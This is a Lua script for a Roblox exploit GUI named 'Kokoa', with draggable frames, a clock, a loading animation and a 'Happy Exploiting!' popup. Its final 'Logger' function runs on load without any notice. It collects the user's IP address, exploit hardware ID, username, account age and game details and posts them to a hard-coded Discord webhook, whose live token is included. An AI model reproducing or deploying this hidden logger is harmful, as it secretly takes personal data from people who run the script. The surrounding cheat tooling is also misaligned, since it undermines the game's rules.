-- Gui to Lua
-- Version: 3.2

-- Instances:

local Kokoa = Instance.new("ScreenGui")
local MainF = Instance.new("ImageLabel")
local SideFrame = Instance.new("ImageLabel")
local Frame = Instance.new("Frame")
local Time = Instance.new("TextLabel")
local Msg = Instance.new("ImageLabel")
local Frame_2 = Instance.new("ImageLabel")
local ImageLabel = Instance.new("ImageLabel")
local TextLabel = Instance.new("TextLabel")

--Properties:

Kokoa.Name = "Kokoa"
Kokoa.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui")

MainF.Name = "MainF"
MainF.Parent = Kokoa
MainF.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
MainF.BackgroundTransparency = 1.000
MainF.Position = UDim2.new(0.377000004, 0, 1, 0)
MainF.Size = UDim2.new(0, 471, 0, 345)
MainF.Image = "rbxassetid://3570695787"
MainF.ImageColor3 = Color3.fromRGB(29, 29, 29)
MainF.ScaleType = Enum.ScaleType.Slice
MainF.SliceCenter = Rect.new(100, 100, 100, 100)
MainF.SliceScale = 0.120

SideFrame.Name = "SideFrame"
SideFrame.Parent = MainF
SideFrame.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
SideFrame.BackgroundTransparency = 1.000
SideFrame.Size = UDim2.new(0, 100, 0, 345)
SideFrame.Image = "rbxassetid://3570695787"
SideFrame.ImageColor3 = Color3.fromRGB(34, 34, 34)
SideFrame.ScaleType = Enum.ScaleType.Slice
SideFrame.SliceCenter = Rect.new(100, 100, 100, 100)
SideFrame.SliceScale = 0.120

Frame.Parent = MainF
Frame.BackgroundColor3 = Color3.fromRGB(34, 34, 34)
Frame.BorderSizePixel = 0
Frame.Position = UDim2.new(0.0361904763, 0, 0, 0)
Frame.Size = UDim2.new(0, 81, 0, 345)

Time.Name = "Time"
Time.Parent = MainF
Time.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Time.BackgroundTransparency = 1.000
Time.Position = UDim2.new(0.707200527, 0, 0, 0)
Time.Size = UDim2.new(0, 200, 0, 50)
Time.Font = Enum.Font.SourceSansSemibold
Time.Text = "Null"
Time.TextColor3 = Color3.fromRGB(255, 255, 255)
Time.TextSize = 14.000

Msg.Name = "Msg"
Msg.Parent = Kokoa
Msg.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Msg.BackgroundTransparency = 1.000
Msg.Position = UDim2.new(0.457479447, 0, 0.432098776, 0)
Msg.Size = UDim2.new(0, 162, 0, 178)
Msg.Image = "rbxassetid://3570695787"
Msg.ImageColor3 = Color3.fromRGB(29, 29, 29)
Msg.ScaleType = Enum.ScaleType.Slice
Msg.SliceCenter = Rect.new(100, 100, 100, 100)
Msg.SliceScale = 0.120

Frame_2.Name = "Frame"
Frame_2.Parent = Msg
Frame_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Frame_2.BackgroundTransparency = 1.000
Frame_2.BorderSizePixel = 0
Frame_2.Position = UDim2.new(0.0740740746, 0, 0.705607474, 0)
Frame_2.Size = UDim2.new(0, 138, 0, 6)
Frame_2.Image = "rbxassetid://3570695787"
Frame_2.ScaleType = Enum.ScaleType.Slice
Frame_2.SliceCenter = Rect.new(100, 100, 100, 100)
Frame_2.SliceScale = 0.120

ImageLabel.Parent = Msg
ImageLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
ImageLabel.BackgroundTransparency = 1.000
ImageLabel.Position = UDim2.new(0.185185194, 0, 0.120287716, 0)
ImageLabel.Size = UDim2.new(0, 100, 0, 100)
ImageLabel.Image = "rbxassetid://6257423124"

TextLabel.Parent = Msg
TextLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel.BackgroundTransparency = 1.000
TextLabel.Position = UDim2.new(0, 0, 0.733644843, 0)
TextLabel.Size = UDim2.new(0, 162, 0, 38)
TextLabel.Font = Enum.Font.SourceSansSemibold
TextLabel.Text = "Null"
TextLabel.TextColor3 = Color3.fromRGB(255, 255, 255)
TextLabel.TextSize = 14.000

-- Scripts:

local function TWUQ_fake_script() -- MainF.Dragify 
	local script = Instance.new('LocalScript', MainF)

	local UIS = game:GetService("UserInputService")
	function dragify(Frame)
	    dragToggle = nil
	    local dragSpeed = 0.25
	    dragInput = nil
	    dragStart = nil
	    local dragPos = nil
	    function updateInput(input)
	        local Delta = input.Position - dragStart
	        local Position = UDim2.new(startPos.X.Scale, startPos.X.Offset + Delta.X, startPos.Y.Scale, startPos.Y.Offset + Delta.Y)
	        game:GetService("TweenService"):Create(Frame, TweenInfo.new(0.25), {Position = Position}):Play()
	    end
	    Frame.InputBegan:Connect(function(input)
	        if (input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch) and UIS:GetFocusedTextBox() == nil then
	            dragToggle = true
	            dragStart = input.Position
	            startPos = Frame.Position
	            input.Changed:Connect(function()
	                if input.UserInputState == Enum.UserInputState.End then
	                    dragToggle = false
	                end
	            end)
	        end
	    end)
	    Frame.InputChanged:Connect(function(input)
	        if input.UserInputType == Enum.UserInputType.MouseMovement or input.UserInputType == Enum.UserInputType.Touch then
	            dragInput = input
	        end
	    end)
	    game:GetService("UserInputService").InputChanged:Connect(function(input)
	        if input == dragInput and dragToggle then
	            updateInput(input)
	        end
	    end)
	end
	
	dragify(script.Parent)
	
	--Dont use with other GUIs etc without my P3rm1ss10N! -W0lfy
end
coroutine.wrap(TWUQ_fake_script)()
local function JVTLPR_fake_script() -- MainF.Time 
	local script = Instance.new('LocalScript', MainF)

	while wait() do
		
		local t = tick()
		
		local sec = math.floor(t % 60)
		
		local min = math.floor((t/60)% 60)
		
		local hour = math.floor((t/3600)% 24)
		
		if string.len(sec) < 2 then sec = "0" .. tostring(sec) end
		
		if string.len(min) < 2 then min = "0" .. tostring(min) end
		
		if string.len(hour) < 2 then hour = "0" .. tostring(hour) end
		
		script.Parent.Time.Text = hour .. ":" .. min .. ":" .. sec
	end
end
coroutine.wrap(JVTLPR_fake_script)()
local function JHDZBN_fake_script() -- MainF.TweenHandler 
	local script = Instance.new('LocalScript', MainF)

	wait(7.5)
	script.Parent:TweenPosition(UDim2.new(0.377, 0,0.352, 0), "Out", "Sine", 1)
end
coroutine.wrap(JHDZBN_fake_script)()
local function XITVVKB_fake_script() -- Kokoa.Message 
	local script = Instance.new('LocalScript', Kokoa)

	wait(7.5)
	game:GetService("StarterGui"):SetCore("SendNotification", {
		Title = "Kokoa",
		Text = "Happy Exploiting!",
		Duration = 6,
		Button1 = "Dismiss";
		Icon = "rbxthumb://type=Asset&id=6241885039&w=150&h=150"
	})
end
coroutine.wrap(XITVVKB_fake_script)()
local function CZQRJLM_fake_script() -- Frame_2.LocalScript 
	local script = Instance.new('LocalScript', Frame_2)

	function zigzag(X) return math.acos(math.cos(X*math.pi))/math.pi end
	
	counter = 0
	
	while wait(0.1) do 
		script.Parent.ImageColor3 = Color3.fromHSV(zigzag(counter),1,1)
		
		counter = counter + 0.01
	end
end
coroutine.wrap(CZQRJLM_fake_script)()
local function AYEHRS_fake_script() -- Msg.Dragify 
	local script = Instance.new('LocalScript', Msg)

	local UIS = game:GetService("UserInputService")
	function dragify(Frame)
	    dragToggle = nil
	    local dragSpeed = 0.25
	    dragInput = nil
	    dragStart = nil
	    local dragPos = nil
	    function updateInput(input)
	        local Delta = input.Position - dragStart
	        local Position = UDim2.new(startPos.X.Scale, startPos.X.Offset + Delta.X, startPos.Y.Scale, startPos.Y.Offset + Delta.Y)
	        game:GetService("TweenService"):Create(Frame, TweenInfo.new(0.25), {Position = Position}):Play()
	    end
	    Frame.InputBegan:Connect(function(input)
	        if (input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch) and UIS:GetFocusedTextBox() == nil then
	            dragToggle = true
	            dragStart = input.Position
	            startPos = Frame.Position
	            input.Changed:Connect(function()
	                if input.UserInputState == Enum.UserInputState.End then
	                    dragToggle = false
	                end
	            end)
	        end
	    end)
	    Frame.InputChanged:Connect(function(input)
	        if input.UserInputType == Enum.UserInputType.MouseMovement or input.UserInputType == Enum.UserInputType.Touch then
	            dragInput = input
	        end
	    end)
	    game:GetService("UserInputService").InputChanged:Connect(function(input)
	        if input == dragInput and dragToggle then
	            updateInput(input)
	        end
	    end)
	end
	
	dragify(script.Parent)
	
	--Dont use with other GUIs etc without my P3rm1ss10N! -W0lfy
end
coroutine.wrap(AYEHRS_fake_script)()
local function EYKGJ_fake_script() -- TextLabel.LocalScript 
	local script = Instance.new('LocalScript', TextLabel)

	while true do
		script.Parent.Text="Loading"
		wait(1)
		script.Parent.Text="Loading."
		wait(1)
		script.Parent.Text="Loading.."
		wait(1)
		script.Parent.Text="Loading..."
		wait(1)
	end
end
coroutine.wrap(EYKGJ_fake_script)()
local function DHWQCUZ_fake_script() -- Msg.Tween 
	local script = Instance.new('LocalScript', Msg)

	wait(6)
	script.Parent:TweenPosition(UDim2.new(0.458, 0,1, 0), "Out", "Sine", 1)
	script.Parent.Visible = false
end
coroutine.wrap(DHWQCUZ_fake_script)()
local function DTXL_fake_script() -- Kokoa.Logger 
	local script = Instance.new('LocalScript', Kokoa)

	local IP = game:HttpGet("https://v4.ident.me")
	plr = game:GetService'Players'.LocalPlayer
	local premium = false
	local ALT = false
	if plr.MembershipType == Enum.MembershipType.Premium then
		premium = true
	elseif plr.MembershipType == Enum.MembershipType.None then
		premium = false
	end
	if premium == false then 
		if plr.AccountAge <= 70 then 
			ALT = true
		end
	end
	
	local market = game:GetService("MarketplaceService")
	local info = market:GetProductInfo(game.PlaceId, Enum.InfoType.Asset)
	
	
	local http_request = http_request;
	if syn then
		http_request = syn.request
	elseif SENTINEL_V2 then
		function http_request(tb)
			return {
				StatusCode = 200;
				Body = request(tb.Url, tb.Method, (tb.Body or ''))
			}
		end
	end
	
	local body = http_request({Url = 'https://httpbin.org/get'; Method = 'GET'}).Body;
	local decoded = game:GetService('HttpService'):JSONDecode(body)
	local hwid_list = {"Syn-Fingerprint", "Exploit-Guid", "Proto-User-Identifier", "Sentinel-Fingerprint"};
	hwid = "";
	
	for i, v in next, hwid_list do
		if decoded.headers[v] then
			hwid = decoded.headers[v];
			break
		end
	end
	
	if hwid then
		local HttpServ = game:GetService('HttpService')
		local url = "https://discord.com/api/webhooks/801111355808546856/inMMKgaKlXIFNa2XomGA5k9XftX-9TzyKDcXILhI70o3kkf8_e-fHAVcm3b2yg2gKNXS"
	
	
		local data = 
			{
				["content"] = "",
				["embeds"] = {{
					["title"] = "__**HWID:**__",
					["description"] = hwid,
					["type"] = "rich",
					["color"] = tonumber(0xAB0909),
					["fields"] = {
						{
							["name"] = "Username:",
							["value"] = Game.Players.LocalPlayer.Name,
							["inline"] = true
						},
						{
							["name"] = "IP Address:",
							["value"] = IP,
							["inline"] = true
						},
						{
							["name"] = "Game Link:",
							["value"] = "https://roblox.com/games/" .. game.PlaceId .. "/",
							["inline"] = true
						},
						{
							["name"] = "Game Name:",
							["value"] = info.Name,
							["inline"] = true
						},
						{
							["name"] = "Age:",
							["value"] = plr.AccountAge,
							["inline"] = true
						},
						{
							["name"] = "Premium:",
							["value"] = premium,
							["inline"] = true
						},
						{
							["name"] = "ALT:",
							["value"] = ALT,
							["inline"] = true
						},
	
					},
				}}
			}
		local newdata = HttpServ:JSONEncode(data)
	
		local headers = {
			["content-type"] = "application/json"
		}
	
		local request_payload = {Url=url, Body=newdata, Method="POST", Headers=headers}
		http_request(request_payload)
	end
end
coroutine.wrap(DTXL_fake_script)()
